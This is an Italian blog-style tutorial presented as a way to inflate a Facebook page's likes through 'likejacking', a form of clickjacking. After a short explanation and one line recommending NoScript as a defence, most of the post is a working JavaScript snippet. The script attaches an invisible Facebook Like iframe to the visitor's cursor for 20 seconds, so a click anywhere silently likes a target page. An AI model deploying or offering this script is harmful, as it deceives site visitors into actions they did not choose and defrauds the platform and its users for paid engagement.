Clickjacking: come aumentare i Mi Piace di una pagina fan di Facebook
Il Clickjacking è una tecnica informatica fraudolenta integrata in alcuni siti web, che sfrutta generalmente JavaScript e che consiste nel nascondere un oggetto dietro un altro oggetto; In questo modo quando un navigatore effettua un click su un oggetto in realtà il suo click viene reindirizzatto su un altro oggetto.
E' facile quindi sfruttare questa tecnica per aumentare i Mi Piace di una qualsiasi pagina fan di Facebook ed in questo caso prende il nome di Likejackink.
Questa tecnica ad esempio è stata sfruttata in molti casi dietro alcuni falsi video player in modo tale che al click sul pulsante Play veniva apprezzata una determinata pagina facebook.
Questo è il modo che usano in molti per aumentare esponenzialmente il numero di fan di una pagina specialmente da coloro che si fanno pagare per aumentare i fan di una pagina facebook.
Per difendersi da questa tecnica su Firefox è disponibile l'estensione NoScript.
Questo è un esmpio di codice per implementare il Likejackink:
<script type="text/javascript">
(function(){
var Xcord = 0,
Ycord = 0,
IE = document.all ? true : false;
if (!IE) document.captureEvents(Event.MOUSEMOVE);
var lbox = document.createElement('iframe');
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'https://www.facebook.com/XXX') + '&layout=standard&show_faces=true&width=53&action=lbox&colorscheme=light&height=80';
lbox.scrolling = 'no';
lbox.frameBorder = 0;
lbox.allowTransparency = 'true';
lbox.style.border = 0;
lbox.style.overflow = 'hidden';
lbox.style.cursor = 'pointer';
lbox.style.width = '53px';
lbox.style.height = '23px';
lbox.style.position = 'absolute';
lbox.style.opacity = 0;
document.getElementsByTagName('body')[0].appendChild(lbox);
window.addEventListener('mousemove', mouseMove, false);
setTimeout(function(){
document.getElementsByTagName('body')[0].removeChild(lbox);
window.removeEventListener('mousemove', mouseMove, false);
}, 20000);
function mouseMove(e) {
if (IE) {
Xcord = event.clientX + document.body.scrollLeft;
Ycord = event.clientY + document.body.scrollTop;
} else {
Xcord = e.pageX;
Ycord = e.pageY;
}
if (Xcord < 0) Xcord = 0;
if (Ycord < 0) Ycord = 0;
lbox.style.top = (Ycord - 8) + 'px';
lbox.style.left = (Xcord - 25) + 'px';
return true
}
})();
</script>